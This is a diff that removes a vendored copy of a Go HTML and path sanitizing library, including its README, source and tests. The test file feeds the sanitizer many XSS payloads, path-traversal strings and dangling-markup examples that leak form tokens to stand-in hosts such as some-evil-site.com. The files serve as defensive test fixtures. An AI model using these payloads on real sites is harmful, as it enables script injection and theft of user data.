@@ -1,22 +0,0 @@ | |||
# Compiled Object files, Static and Dynamic libs (Shared Objects) | |||
*.o | |||
*.a | |||
*.so | |||
# Folders | |||
_obj | |||
_test | |||
# Architecture specific extensions/prefixes | |||
*.[568vq] | |||
[568vq].out | |||
*.cgo1.go | |||
*.cgo2.c | |||
_cgo_defun.c | |||
_cgo_gotypes.go | |||
_cgo_export.* | |||
_testmain.go | |||
*.exe |
@@ -1 +0,0 @@ | |||
language: go |
@@ -1,27 +0,0 @@ | |||
Copyright (c) 2017 Mechanism Design. All rights reserved. | |||
Redistribution and use in source and binary forms, with or without | |||
modification, are permitted provided that the following conditions are | |||
met: | |||
* Redistributions of source code must retain the above copyright | |||
notice, this list of conditions and the following disclaimer. | |||
* Redistributions in binary form must reproduce the above | |||
copyright notice, this list of conditions and the following disclaimer | |||
in the documentation and/or other materials provided with the | |||
distribution. | |||
* Neither the name of Google Inc. nor the names of its | |||
contributors may be used to endorse or promote products derived from | |||
this software without specific prior written permission. | |||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS | |||
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT | |||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR | |||
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT | |||
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, | |||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT | |||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, | |||
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY | |||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT | |||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |||
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. |
@@ -1,62 +0,0 @@ | |||
sanitize [![GoDoc](https://godoc.org/github.com/kennygrant/sanitize?status.svg)](https://godoc.org/github.com/kennygrant/sanitize) [![Go Report Card](https://goreportcard.com/badge/github.com/kennygrant/sanitize)](https://goreportcard.com/report/github.com/kennygrant/sanitize) [![CircleCI](https://circleci.com/gh/kennygrant/sanitize.svg?style=svg)](https://circleci.com/gh/kennygrant/sanitize) | |||
======== | |||
Package sanitize provides functions to sanitize html and paths with go (golang). | |||
FUNCTIONS | |||
```go | |||
sanitize.Accents(s string) string | |||
``` | |||
Accents replaces a set of accented characters with ascii equivalents. | |||
```go | |||
sanitize.BaseName(s string) string | |||
``` | |||
BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -. Unlike Name no attempt is made to normalise text as a path. | |||
```go | |||
sanitize.HTML(s string) string | |||
``` | |||
HTML strips html tags with a very simple parser, replace common entities, and escape < and > in the result. The result is intended to be used as plain text. | |||
```go | |||
sanitize.HTMLAllowing(s string, args...[]string) (string, error) | |||
``` | |||
HTMLAllowing parses html and allow certain tags and attributes from the lists optionally specified by args - args[0] is a list of allowed tags, args[1] is a list of allowed attributes. If either is missing default sets are used. | |||
```go | |||
sanitize.Name(s string) string | |||
``` | |||
Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters. | |||
```go | |||
sanitize.Path(s string) string | |||
``` | |||
Path makes a string safe to use as an url path. | |||
Changes | |||
Version 1.2 | |||
Adjusted HTML function to avoid linter warning | |||
Added more tests from https://githubengineering.com/githubs-post-csp-journey/ | |||
Chnaged name of license file | |||
Added badges and change log to readme | |||
Version 1.1 | |||
Fixed type in comments. | |||
Merge pull request from Povilas Balzaravicius Pawka | |||
- replace br tags with newline even when they contain a space | |||
Version 1.0 | |||
First release |
@@ -1,383 +0,0 @@ | |||
// Package sanitize provides functions for sanitizing text. | |||
package sanitize | |||
import ( | |||
"bytes" | |||
"html" | |||
"html/template" | |||
"io" | |||
"path" | |||
"regexp" | |||
"strings" | |||
parser "golang.org/x/net/html" | |||
) | |||
var ( | |||
ignoreTags = []string{"title", "script", "style", "iframe", "frame", "frameset", "noframes", "noembed", "embed", "applet", "object", "base"} | |||
defaultTags = []string{"h1", "h2", "h3", "h4", "h5", "h6", "div", "span", "hr", "p", "br", "b", "i", "strong", "em", "ol", "ul", "li", "a", "img", "pre", "code", "blockquote"} | |||
defaultAttributes = []string{"id", "class", "src", "href", "title", "alt", "name", "rel"} | |||
) | |||
// HTMLAllowing sanitizes html, allowing some tags. | |||
// Arrays of allowed tags and allowed attributes may optionally be passed as the second and third arguments. | |||
func HTMLAllowing(s string, args ...[]string) (string, error) { | |||
allowedTags := defaultTags | |||
if len(args) > 0 { | |||
allowedTags = args[0] | |||
} | |||
allowedAttributes := defaultAttributes | |||
if len(args) > 1 { | |||
allowedAttributes = args[1] | |||
} | |||
// Parse the html | |||
tokenizer := parser.NewTokenizer(strings.NewReader(s)) | |||
buffer := bytes.NewBufferString("") | |||
ignore := "" | |||
for { | |||
tokenType := tokenizer.Next() | |||
token := tokenizer.Token() | |||
switch tokenType { | |||
case parser.ErrorToken: | |||
err := tokenizer.Err() | |||
if err == io.EOF { | |||
return buffer.String(), nil | |||
} | |||
return "", err | |||
case parser.StartTagToken: | |||
if len(ignore) == 0 && includes(allowedTags, token.Data) { | |||
token.Attr = cleanAttributes(token.Attr, allowedAttributes) | |||
buffer.WriteString(token.String()) | |||
} else if includes(ignoreTags, token.Data) { | |||
ignore = token.Data | |||
} | |||
case parser.SelfClosingTagToken: | |||
if len(ignore) == 0 && includes(allowedTags, token.Data) { | |||
token.Attr = cleanAttributes(token.Attr, allowedAttributes) | |||
buffer.WriteString(token.String()) | |||
} else if token.Data == ignore { | |||
ignore = "" | |||
} | |||
case parser.EndTagToken: | |||
if len(ignore) == 0 && includes(allowedTags, token.Data) { | |||
token.Attr = []parser.Attribute{} | |||
buffer.WriteString(token.String()) | |||
} else if token.Data == ignore { | |||
ignore = "" | |||
} | |||
case parser.TextToken: | |||
// We allow text content through, unless ignoring this entire tag and its contents (including other tags) | |||
if ignore == "" { | |||
buffer.WriteString(token.String()) | |||
} | |||
case parser.CommentToken: | |||
// We ignore comments by default | |||
case parser.DoctypeToken: | |||
// We ignore doctypes by default - html5 does not require them and this is intended for sanitizing snippets of text | |||
default: | |||
// We ignore unknown token types by default | |||
} | |||
} | |||
} | |||
// HTML strips html tags, replace common entities, and escapes <>&;'" in the result. | |||
// Note the returned text may contain entities as it is escaped by HTMLEscapeString, and most entities are not translated. | |||
func HTML(s string) (output string) { | |||
// Shortcut strings with no tags in them | |||
if !strings.ContainsAny(s, "<>") { | |||
output = s | |||
} else { | |||
// First remove line breaks etc as these have no meaning outside html tags (except pre) | |||
// this means pre sections will lose formatting... but will result in less unintentional paras. | |||
s = strings.Replace(s, "\n", "", -1) | |||
// Then replace line breaks with newlines, to preserve that formatting | |||
s = strings.Replace(s, "</p>", "\n", -1) | |||
s = strings.Replace(s, "<br>", "\n", -1) | |||
s = strings.Replace(s, "</br>", "\n", -1) | |||
s = strings.Replace(s, "<br/>", "\n", -1) | |||
s = strings.Replace(s, "<br />", "\n", -1) | |||
// Walk through the string removing all tags | |||
b := bytes.NewBufferString("") | |||
inTag := false | |||
for _, r := range s { | |||
switch r { | |||
case '<': | |||
inTag = true | |||
case '>': | |||
inTag = false | |||
default: | |||
if !inTag { | |||
b.WriteRune(r) | |||
} | |||
} | |||
} | |||
output = b.String() | |||
} | |||
// Remove a few common harmless entities, to arrive at something more like plain text | |||
output = strings.Replace(output, "‘", "'", -1) | |||
output = strings.Replace(output, "’", "'", -1) | |||
output = strings.Replace(output, "“", "\"", -1) | |||
output = strings.Replace(output, "”", "\"", -1) | |||
output = strings.Replace(output, " ", " ", -1) | |||
output = strings.Replace(output, """, "\"", -1) | |||
output = strings.Replace(output, "'", "'", -1) | |||
// Translate some entities into their plain text equivalent (for example accents, if encoded as entities) | |||
output = html.UnescapeString(output) | |||
// In case we have missed any tags above, escape the text - removes <, >, &, ' and ". | |||
output = template.HTMLEscapeString(output) | |||
// After processing, remove some harmless entities &, ' and " which are encoded by HTMLEscapeString | |||
output = strings.Replace(output, """, "\"", -1) | |||
output = strings.Replace(output, "'", "'", -1) | |||
output = strings.Replace(output, "& ", "& ", -1) // NB space after | |||
output = strings.Replace(output, "&amp; ", "& ", -1) // NB space after | |||
return output | |||
} | |||
// We are very restrictive as this is intended for ascii url slugs | |||
var illegalPath = regexp.MustCompile(`[^[:alnum:]\~\-\./]`) | |||
// Path makes a string safe to use as an url path. | |||
func Path(s string) string { | |||
// Start with lowercase string | |||
filePath := strings.ToLower(s) | |||
filePath = strings.Replace(filePath, "..", "", -1) | |||
filePath = path.Clean(filePath) | |||
// Remove illegal characters for paths, flattening accents and replacing some common separators with - | |||
filePath = cleanString(filePath, illegalPath) | |||
// NB this may be of length 0, caller must check | |||
return filePath | |||
} | |||
// Remove all other unrecognised characters apart from | |||
var illegalName = regexp.MustCompile(`[^[:alnum:]-.]`) | |||
// Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters. | |||
func Name(s string) string { | |||
// Start with lowercase string | |||
fileName := strings.ToLower(s) | |||
fileName = path.Clean(path.Base(fileName)) | |||
// Remove illegal characters for names, replacing some common separators with - | |||
fileName = cleanString(fileName, illegalName) | |||
// NB this may be of length 0, caller must check | |||
return fileName | |||
} | |||
// Replace these separators with - | |||
var baseNameSeparators = regexp.MustCompile(`[./]`) | |||
// BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -. | |||
// No attempt is made to normalise a path or normalise case. | |||
func BaseName(s string) string { | |||
// Replace certain joining characters with a dash | |||
baseName := baseNameSeparators.ReplaceAllString(s, "-") | |||
// Remove illegal characters for names, replacing some common separators with - | |||
baseName = cleanString(baseName, illegalName) | |||
// NB this may be of length 0, caller must check | |||
return baseName | |||
} | |||
// A very limited list of transliterations to catch common european names translated to urls. | |||
// This set could be expanded with at least caps and many more characters. | |||
var transliterations = map[rune]string{ | |||
'À': "A", | |||
'Á': "A", | |||
'Â': "A", | |||
'Ã': "A", | |||
'Ä': "A", | |||
'Å': "AA", | |||
'Æ': "AE", | |||
'Ç': "C", | |||
'È': "E", | |||
'É': "E", | |||
'Ê': "E", | |||
'Ë': "E", | |||
'Ì': "I", | |||
'Í': "I", | |||
'Î': "I", | |||
'Ï': "I", | |||
'Ð': "D", | |||
'Ł': "L", | |||
'Ñ': "N", | |||
'Ò': "O", | |||
'Ó': "O", | |||
'Ô': "O", | |||
'Õ': "O", | |||
'Ö': "O", | |||
'Ø': "OE", | |||
'Ù': "U", | |||
'Ú': "U", | |||
'Ü': "U", | |||
'Û': "U", | |||
'Ý': "Y", | |||
'Þ': "Th", | |||
'ß': "ss", | |||
'à': "a", | |||
'á': "a", | |||
'â': "a", | |||
'ã': "a", | |||
'ä': "a", | |||
'å': "aa", | |||
'æ': "ae", | |||
'ç': "c", | |||
'è': "e", | |||
'é': "e", | |||
'ê': "e", | |||
'ë': "e", | |||
'ì': "i", | |||
'í': "i", | |||
'î': "i", | |||
'ï': "i", | |||
'ð': "d", | |||
'ł': "l", | |||
'ñ': "n", | |||
'ń': "n", | |||
'ò': "o", | |||
'ó': "o", | |||
'ô': "o", | |||
'õ': "o", | |||
'ō': "o", | |||
'ö': "o", | |||
'ø': "oe", | |||
'ś': "s", | |||
'ù': "u", | |||
'ú': "u", | |||
'û': "u", | |||
'ū': "u", | |||
'ü': "u", | |||
'ý': "y", | |||
'þ': "th", | |||
'ÿ': "y", | |||
'ż': "z", | |||
'Œ': "OE", | |||
'œ': "oe", | |||
} | |||
// Accents replaces a set of accented characters with ascii equivalents. | |||
func Accents(s string) string { | |||
// Replace some common accent characters | |||
b := bytes.NewBufferString("") | |||
for _, c := range s { | |||
// Check transliterations first | |||
if val, ok := transliterations[c]; ok { | |||
b.WriteString(val) | |||
} else { | |||
b.WriteRune(c) | |||
} | |||
} | |||
return b.String() | |||
} | |||
var ( | |||
// If the attribute contains data: or javascript: anywhere, ignore it | |||
// we don't allow this in attributes as it is so frequently used for xss | |||
// NB we allow spaces in the value, and lowercase. | |||
illegalAttr = regexp.MustCompile(`(d\s*a\s*t\s*a|j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*)\s*:`) | |||
// We are far more restrictive with href attributes. | |||
legalHrefAttr = regexp.MustCompile(`\A[/#][^/\\]?|mailto://|http://|https://`) | |||
) | |||
// cleanAttributes returns an array of attributes after removing malicious ones. | |||
func cleanAttributes(a []parser.Attribute, allowed []string) []parser.Attribute { | |||
if len(a) == 0 { | |||
return a | |||
} | |||
var cleaned []parser.Attribute | |||
for _, attr := range a { | |||
if includes(allowed, attr.Key) { | |||
val := strings.ToLower(attr.Val) | |||
// Check for illegal attribute values | |||
if illegalAttr.FindString(val) != "" { | |||
attr.Val = "" | |||
} | |||
// Check for legal href values - / mailto:// http:// or https:// | |||
if attr.Key == "href" { | |||
if legalHrefAttr.FindString(val) == "" { | |||
attr.Val = "" | |||
} | |||
} | |||
// If we still have an attribute, append it to the array | |||
if attr.Val != "" { | |||
cleaned = append(cleaned, attr) | |||
} | |||
} | |||
} | |||
return cleaned | |||
} | |||
// A list of characters we consider separators in normal strings and replace with our canonical separator - rather than removing. | |||
var ( | |||
separators = regexp.MustCompile(`[ &_=+:]`) | |||
dashes = regexp.MustCompile(`[\-]+`) | |||
) | |||
// cleanString replaces separators with - and removes characters listed in the regexp provided from string. | |||
// Accents, spaces, and all characters not in A-Za-z0-9 are replaced. | |||
func cleanString(s string, r *regexp.Regexp) string { | |||
// Remove any trailing space to avoid ending on - | |||
s = strings.Trim(s, " ") | |||
// Flatten accents first so that if we remove non-ascii we still get a legible name | |||
s = Accents(s) | |||
// Replace certain joining characters with a dash | |||
s = separators.ReplaceAllString(s, "-") | |||
// Remove all other unrecognised characters - NB we do allow any printable characters | |||
s = r.ReplaceAllString(s, "") | |||
// Remove any multiple dashes caused by replacements above | |||
s = dashes.ReplaceAllString(s, "-") | |||
return s | |||
} | |||
// includes checks for inclusion of a string in a []string. | |||
func includes(a []string, s string) bool { | |||
for _, as := range a { | |||
if as == s { | |||
return true | |||
} | |||
} | |||
return false | |||
} |
@@ -1,233 +0,0 @@ | |||
// Utility functions for working with text | |||
package sanitize | |||
import ( | |||
"testing" | |||
) | |||
var Format = "\ninput: %q\nexpected: %q\noutput: %q" | |||
type Test struct { | |||
input string | |||
expected string | |||
} | |||
// NB the treatment of accents - they are removed and replaced with ascii transliterations | |||
var urls = []Test{ | |||
{"ReAd ME.md", `read-me.md`}, | |||
{"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`}, | |||
{"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`}, | |||
{"/../../4-icon.jpg", `/4-icon.jpg`}, | |||
{"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`}, | |||
{"../4 icon.*", `/4-icon.`}, | |||
{"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`}, | |||
{"../*", `/`}, | |||
} | |||
func TestPath(t *testing.T) { | |||
for _, test := range urls { | |||
output := Path(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
func BenchmarkPath(b *testing.B) { | |||
for i := 0; i < b.N; i++ { | |||
for _, test := range urls { | |||
output := Path(test.input) | |||
if output != test.expected { | |||
b.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
} | |||
var fileNames = []Test{ | |||
{"ReAd ME.md", `read-me.md`}, | |||
{"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`}, | |||
{"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`}, | |||
{"/../../4-icon.jpg", `4-icon.jpg`}, | |||
{"/Images/../4-icon.jpg", `4-icon.jpg`}, | |||
{"../4 icon.jpg", `4-icon.jpg`}, | |||
{"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`}, | |||
} | |||
func TestName(t *testing.T) { | |||
for _, test := range fileNames { | |||
output := Name(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
func BenchmarkName(b *testing.B) { | |||
for i := 0; i < b.N; i++ { | |||
for _, test := range fileNames { | |||
output := Name(test.input) | |||
if output != test.expected { | |||
b.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
} | |||
var baseFileNames = []Test{ | |||
{"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`}, | |||
{"/../../4-iCoN.jpg", `-4-iCoN-jpg`}, | |||
{"And/Or", `And-Or`}, | |||
{"Sonic.EXE", `Sonic-EXE`}, | |||
{"012: #Fetch for Defaults", `012-Fetch-for-Defaults`}, | |||
} | |||
func TestBaseName(t *testing.T) { | |||
for _, test := range baseFileNames { | |||
output := BaseName(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
// Test with some malformed or malicious html | |||
// NB because we remove all tokens after a < until the next > | |||
// and do not attempt to parse, we should be safe from invalid html, | |||
// but will sometimes completely empty the string if we have invalid input | |||
// Note we sometimes use " in order to keep things on one line and use the ` character | |||
var htmlTests = []Test{ | |||
{` `, " "}, | |||
{`&#x000D;`, `&#x000D;`}, | |||
{`<invalid attr="invalid"<,<p><p><p><p><p>`, ``}, | |||
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."}, | |||
{`FOO
ZOO`, "FOO\rZOO"}, | |||
{`<script><!--<script </s`, ``}, | |||
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`}, | |||
{`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`}, | |||
{`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"}, | |||
{`Something<br/>Some more`, "Something\nSome more"}, | |||
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""}, | |||
{`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`}, | |||
{`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`}, | |||
{`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`}, | |||
{`<iframe src="" attr="">>>>>>`, `<iframe src="" attr="">`}, | |||
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`}, | |||
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``}, | |||
{`<IMG SRC=JaVaScRiPt:alert('XSS')>`, ``}, | |||
{`<IMG SRC="javascript:alert('XSS')" <test`, ``}, | |||
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``}, | |||
{`> & test <`, `> & test <`}, | |||
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``}, | |||
{`“hello” it’s for ‘real’`, `"hello" it's for 'real'`}, | |||
{`<IMG SRC=javascript:a& | |||
#0000108ert('XSS')>`, ``}, | |||
{`'';!--"<XSS>=&{()}`, `'';!--"=&{()}`}, | |||
{"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"}, | |||
// Examples from https://githubengineering.com/githubs-post-csp-journey/ | |||
{`<img src='https://example.com/log_csrf?html=`, ``}, | |||
{`<img src='https://example.com/log_csrf?html= | |||
<form action="https://example.com/account/public_keys/19023812091023"> | |||
... | |||
<input type="hidden" name="csrf_token" value="some_csrf_token_value"> | |||
</form>`, `...`}, | |||
{`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f | |||
<p>secret</p>`, `secret | |||
`}, | |||
{`<form action="https://some-evil-site.com"><button>Click</button><textarea name=' | |||
<!-- </textarea> --><!-- '" --> | |||
<form action="/logout"> | |||
<input name="authenticity_token" type="hidden" value="secret1"> | |||
</form>`, `Click -- `}, | |||
} | |||
func TestHTML(t *testing.T) { | |||
for _, test := range htmlTests { | |||
output := HTML(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
var htmlTestsAllowing = []Test{ | |||
{`<IMG SRC="jav
ascript:alert('XSS');">`, `<img>`}, | |||
{`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`}, | |||
{`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`}, | |||
{`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`}, | |||
{`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`}, | |||
{`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`}, | |||
{`<b>hello world</b>`, `<b>hello world</b>`}, | |||
{`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`}, | |||
{`&#x000D;`, `&#x000D;`}, | |||
{`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`}, | |||
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."}, | |||
{"`FOO
ZOO", "`FOO ZOO"}, | |||
{`<script><!--<script </s`, ``}, | |||
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`}, | |||
{"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?> or <p id=\"0</p\"> or <<><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>"}, | |||
{`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`}, | |||
{"Something<br/>Some more", `Something<br/>Some more`}, | |||
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.`}, | |||
{"<sender ignore=me>John Smith</sender>", `John Smith`}, | |||
{"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`}, | |||
{"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``}, | |||
{`<iframe src="" attr="">`, `<iframe src="" attr="">`}, | |||
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>">`}, | |||
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`}, | |||
{`<IMG SRC=JaVaScRiPt:alert('XSS')>`, ``}, | |||
{`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>>> `}, | |||
{`> & test <`, `> & test <`}, | |||
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`}, | |||
{`<img src="data:text/javascript;alert('alert');">`, `<img>`}, | |||
{`<iframe src=http://... <`, ``}, | |||
{`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``}, | |||
{`<img src=javascript:alert(document.cookie)>`, `<img>`}, | |||
{`<?php echo('hello world')>`, ``}, | |||
{`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`}, | |||
{`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`}, | |||
{`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`, | |||
`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`}, | |||
{`<a href="javascript:alert('XSS1')" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup');">XSS<a>`}, | |||
{`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write("UNTRUSTED INPUT: " + document.location.hash); >`}, | |||
{`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`}, | |||
{`<IMG SRC=javascript:alert('XSS')>`, `<img>`}, | |||
{`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`}, | |||
{`<IMG SRC="jav	ascript:alert('XSS');">`, `<img>`}, | |||
{`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`}, | |||
{`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC="http://ha.ckers.org/xss.js">`}, | |||
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`}, | |||
{`'';!--"<XSS>=&{()}`, `'';!--"=&{()}`}, | |||
{`<IMG SRC=javascript:alert('XSS')`, ``}, | |||
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>">`}, | |||
{`<IMG SRC=javascript:a& | |||
#0000108ert('XSS')>`, `<img>`}, | |||
} | |||
func TestHTMLAllowed(t *testing.T) { | |||
for _, test := range htmlTestsAllowing { | |||
output, err := HTMLAllowing(test.input) | |||
if err != nil { | |||
t.Fatalf(Format, test.input, test.expected, output, err) | |||
} | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
func BenchmarkHTMLAllowed(b *testing.B) { | |||
for i := 0; i < b.N; i++ { | |||
for _, test := range htmlTestsAllowing { | |||
output, err := HTMLAllowing(test.input) | |||
if err != nil { | |||
b.Fatalf(Format, test.input, test.expected, output, err) | |||
} | |||
if output != test.expected { | |||
b.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
} |